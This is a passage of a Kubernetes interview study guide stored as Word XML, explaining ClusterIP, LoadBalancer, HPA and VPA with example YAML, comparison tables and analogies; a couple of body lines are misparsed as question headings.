        <w:t xml:space="preserve">      * Cluster = building</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NodePort = opening the same door on every floor</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Anyone can enter via that door on any floor</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Quick testing of applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Debugging services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simple cluster setups without cloud load balancers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A NodePort Service in Kubernetes is a service type that exposes an application on a static port on each node’s IP address, allowing external traffic to access the service by forwarding requests from the node port to the underlying pods through the service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q270. What is ClusterIP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A ClusterIP Service in Kubernetes is the default type of Service that exposes applications only inside the cluster using an internal virtual IP address.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>ClusterIP makes a service reachable only from within the Kubernetes cluster.</w:t>
        <w:br/>
        <w:t>It is used for internal communication between pods and services.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why ClusterIP is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enable pod-to-service communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provide a stable internal endpoint</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Abstract away changing Pod IPs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Support microservices architecture inside the cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Kubernetes assigns a virtual ClusterIP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. This IP is only reachable inside the cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. kube-proxy routes traffic to backend Pods</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q271. Pods communicate using service name or ClusterIP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow</w:t>
        <w:br/>
        <w:t>Pod → ClusterIP Service → kube-proxy → Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Service YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Service</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: backend-service</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  type: ClusterIP</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    app: backend</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - port: 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">    targetPort: 8080</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it is accessed</w:t>
        <w:br/>
        <w:t>From inside the cluster:</w:t>
        <w:br/>
        <w:t>http://backend-service</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>http://10.96.0.10</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Internal-only access (no external exposure)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stable virtual IP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balances traffic across Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with kube-proxy for routing</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ClusterIP vs other Service types</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ClusterIP</w:t>
        <w:br/>
        <w:tab/>
        <w:t>NodePort</w:t>
        <w:br/>
        <w:tab/>
        <w:t>LoadBalancer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>External access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✔ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✔ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Internal cluster</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node-level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cloud/external</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Microservices</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Dev/testing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production exposure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a company:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster = office building</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ClusterIP = internal phone extension</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Only employees inside the company can call it</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use ClusterIP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Backend services (databases, APIs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Microservice communication</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Internal-only applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Default service type in Kubernetes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important point</w:t>
        <w:br/>
        <w:t>Even though Pods have their own IPs, they are ephemeral, while ClusterIP provides a stable access point.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A ClusterIP Service in Kubernetes is the default service type that exposes an application on an internal virtual IP address, enabling stable and load-balanced communication between pods within the cluster while remaining inaccessible from outside the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q272. Explain LoadBalancer service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A LoadBalancer Service in Kubernetes is a Service type that exposes applications externally using a cloud provider’s load balancer, automatically distributing traffic across Pods.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>LoadBalancer Service gives your application a public IP and routes external traffic into the cluster.</w:t>
        <w:br/>
        <w:t>It is the standard way to expose services in production on cloud platforms.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Expose applications to the internet</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatically distribute traffic across multiple Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provide high availability and scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid manual NodePort management</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. You create a Service of type LoadBalancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Kubernetes requests an external load balancer from the cloud provider</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Cloud provider creates a public IP + load balancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Traffic flows into Kubernetes via this load balancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. kube-proxy routes traffic to Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traffic flow</w:t>
        <w:br/>
        <w:t>Internet → Cloud Load Balancer → Node → Service → Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Service</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app-lb</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  type: LoadBalancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    app: my-app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - port: 80</w:t>
        <w:br/>
        <w:t xml:space="preserve">    targetPort: 8080</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens after creation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes talks to cloud provider (AWS, Azure, GCP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A public IP address is assigned</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * That IP becomes entry point to your app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Provides external access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatically creates cloud load balancer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works only in cloud environments (or with external LB support)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Combines NodePort + ClusterIP internally</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports scaling and high availability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>LoadBalancer vs other Services</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ClusterIP</w:t>
        <w:br/>
        <w:tab/>
        <w:t>NodePort</w:t>
        <w:br/>
        <w:tab/>
        <w:t>LoadBalancer</w:t>
        <w:br/>
        <w:tab/>
        <w:t>External access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✔ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✔ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Public IP</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✔ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Internal apps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Dev/testing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High (managed)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a building:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ClusterIP = internal phone system</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * NodePort = open door on every floor</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * LoadBalancer = security gate + receptionist that directs visitors to correct department</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important internal behavior</w:t>
        <w:br/>
        <w:t>LoadBalancer Service internally creates:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A NodePort Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * A ClusterIP Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * External cloud load balancer in front</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requires cloud provider support (AWS, Azure, GCP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Can be expensive (each LB costs money)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Less flexible than Ingress for HTTP routing</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to use it</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Public APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Web applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Production services needing direct external access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simple external exposure without complex routing</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A LoadBalancer Service in Kubernetes is a service type that provisions an external load balancer from a cloud provider to expose applications outside the cluster, automatically routing internet traffic to backend pods through a stable public IP address and internal service mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q273. What is HPA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HPA (Horizontal Pod Autoscaler) in Kubernetes is a feature that automatically scales the number of pod replicas up or down based on resource usage or custom metrics.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>HPA adjusts the number of running Pods dynamically based on demand.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High load → more pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Low load → fewer pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why HPA is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handle traffic spikes automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve application availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Optimize resource usage (cost efficiency)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid manual scaling</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How HPA works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. HPA continuously monitors metrics (via Metrics Server)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. It compares current usage with target values</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. It adjusts replica count of a Deployment/ReplicaSet/StatefulSet</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common metrics used</w:t>
        <w:br/>
        <w:t>1. CPU utilization (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: keep CPU usage at 60%</w:t>
        <w:br/>
        <w:t>2. Memory usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scale based on memory consumption</w:t>
        <w:br/>
        <w:t>3. Custom metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requests per second</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Queue length</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Latency</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example HPA YAML</w:t>
        <w:br/>
        <w:t>apiVersion: autoscaling/v2</w:t>
        <w:br/>
        <w:t>kind: HorizontalPodAutoscaler</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app-hpa</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  scaleTargetRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kind: Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: my-app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  minReplicas: 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  maxReplicas: 10</w:t>
        <w:br/>
        <w:t xml:space="preserve">  metrics:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - type: Resource</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resource:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      name: cpu</w:t>
        <w:br/>
        <w:t xml:space="preserve">      target:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        type: Utilization</w:t>
        <w:br/>
        <w:t xml:space="preserve">        averageUtilization: 60</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How scaling happens</w:t>
        <w:br/>
        <w:t>If CPU &gt; 60%</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA increases replicas (scale out)</w:t>
        <w:br/>
        <w:t>If CPU &lt; 60%</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA decreases replicas (scale in)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>HPA components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics Server (collects CPU/memory data)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA controller (decides scaling)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Target workload (Deployment/ReplicaSet)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>HPA vs VPA vs Cluster Autoscaler</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>VPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster Autoscaler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scales</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Direction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Horizontal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Vertical</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Infrastructure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Traffic scaling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource tuning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster capacity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a restaurant:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods = chefs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA = manager who hires more chefs during rush hours and sends them home during slow hours</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with Deployment/ReplicaSet/StatefulSet</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Requires Metrics Server</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Responds to real-time workload changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Has min and max replica limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not instant (has cooldown period)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Depends on metrics availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * May over/under-shoot in sudden spikes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>HPA in Kubernetes is a controller that automatically scales the number of pod replicas in a deployment based on observed metrics such as CPU or memory utilization, enabling applications to handle varying workloads efficiently by dynamically adjusting capacity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q274. Explain VPA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VPA (Vertical Pod Autoscaler) in Kubernetes is a mechanism that automatically adjusts the CPU and memory requests/limits of containers inside a Pod based on their actual usage.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>VPA scales up or down the resources of a pod, not the number of pods.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * HPA → scales pods (horizontal)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * VPA → scales resources per pod (vertical)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why VPA is used</w:t>
        <w:br/>
        <w:t>It helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Right-size CPU and memory automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevent over-provisioning (waste)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prevent under-provisioning (crashes/OOMKilled)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improve cluster resource efficiency</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How VPA works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. VPA collects historical and real-time usage metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. It analyzes resource consumption patterns</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. It recommends or applies new CPU/memory values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q275. Pods are updated accordingly (often restarted)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>VPA modes</w:t>
        <w:br/>
        <w:t>1. Off (Recommendation only)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Suggests optimal CPU/memory</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Does NOT apply changes</w:t>
        <w:br/>
        <w:t>2. Auto (Active mode)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatically updates resource requests/limits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * May restart pods to apply changes</w:t>
        <w:br/>
        <w:t>3. Initial</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sets resources only at pod creation time</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No changes after pod is running</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example VPA YAML</w:t>
        <w:br/>
        <w:t>apiVersion: autoscaling.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: VerticalPodAutoscaler</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app-vpa</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  targetRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    kind: Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: my-app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  updatePolicy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    updateMode: "Auto"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How scaling happens</w:t>
        <w:br/>
        <w:t>If pod uses more CPU than expected:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * VPA increases CPU request</w:t>
        <w:br/>
        <w:t>If memory usage is higher:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * VPA increases memory request</w:t>
        <w:br/>
        <w:t>If usage is low:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * VPA can reduce allocated resources</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>VPA vs HPA (very important)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>VPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HPA</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scales</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU/Memory of pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Number of pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Direction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Vertical scaling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Horizontal scaling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes (often)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Best for</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stateful / stable workloads</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stateless / scalable workloads</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When NOT to use VPA</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If application cannot tolerate restarts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If using HPA on same metrics (conflict risk)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * If workload requires predictable scaling behavior</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practice</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Use VPA for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch jobs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stateful workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Memory-heavy applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid combining HPA + VPA on same metric (CPU/memory)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a worker:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * VPA = increasing or decreasing worker’s desk size, tools, and resources</w:t>
        <w:br/>
